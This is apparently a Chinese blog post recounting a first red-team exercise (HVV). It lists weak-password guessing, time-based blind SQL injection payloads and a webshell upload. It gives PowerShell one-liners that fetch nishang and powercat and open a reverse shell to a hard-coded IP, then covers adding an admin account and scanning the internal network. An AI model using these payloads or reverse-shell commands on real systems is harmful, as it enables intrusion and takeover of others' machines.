记第一次 HVV 经历

弱口令永远的神🐍

Posted by Elli0t on 2020-10-26

好的工具

渗透测试工具、网络安全工具、用于渗透测试和安全审计的工具

https://www.uedbox.com/tools/

流程

Web 端

社工

目录扫描:Dirsearch

综合扫描:https://scan.top15.cn/

找到一些网站的 cms 然后查看其有信息泄漏的网址

tphp

弱口令

这部分就是找到 admin 后台,然后常用弱口令或者该 cms 的后台默认密码。如果想爆破的话,就要利用社工手段然后用 crunch 生成字典进行爆破。

2020

lslsld

baq

爆破常用的工具:九头蛇、msf …

SQL inject

发现注入点

没有回显的就常规盲注、时间盲注

常用函数和语句

1
2
3
4
benchmark(50000000,md5(1212))
case xxx then yyy else zzz end xxx 等于 if(xxx, yyy, zzz)
如果"<"或者">"被禁止了,则使用 greatest(xxx, 64)=64
1\%' AND if(length(database())=7,benchmark(10000000,md5(0x41)),1) AND '\%'='

爆破数据库名字:1\%' AND if(ascii(mid(database(),4,1))=121,benchmark(10000000,md5(0x41)),1) AND '\%'='

爆破表名字:1\%' AND if(ascii(mid((select+table_name from information_schema.tables where table_schema='mysql' limit 0,1),1,1))=99,1,benchmark(10000000,md5(0x41))) AND '\%'='

其中 mysql 是数据库名字

sql注入关键词绕过

get shell

上传点拿到 shell

再获得 webshell 的前提下,利用 msf 提权,获得 web 跳板机管理员权限。

asdf

20200607 0955

D roomtype. ooL gK 6owgeo

然后用蚁剑连接,接着反弹 shell 整一个☝️。

1
2
3
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 106.12.88.124 -port 6666

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 106.12.88.124 -p 6666 -e cmd

为什么这里要用反弹 shell 呢?因为 webshell 是非交互式 shell,反弹的 shell 是交互式的 shell。请看:https://blog.csdn.net/redwand/article/details/105791548

最后开启 RDP 连接之,当时我们一直无法爆破出 admin 的密码,然后就新建立了一个账户,加入管理员组。

配置此本地服务器

AIRSA

内网

等拿到外网 Web 服务器权限后,第一件事就是稍微维持一下权限(其实这个不太会)。然后就是在这台机器上寻找到有价值的信息,很多管理员会将重要的信息放在服务器的桌面上……

desktop3

desktop

desktop2

巡风内网扫描器

关闭防火墙

卸载更新

arp_-a

lskdfjowe

nmap 进行了内网的扫描,发现了一些内网主机。

nmap

内网穿透

先到这,后面再来补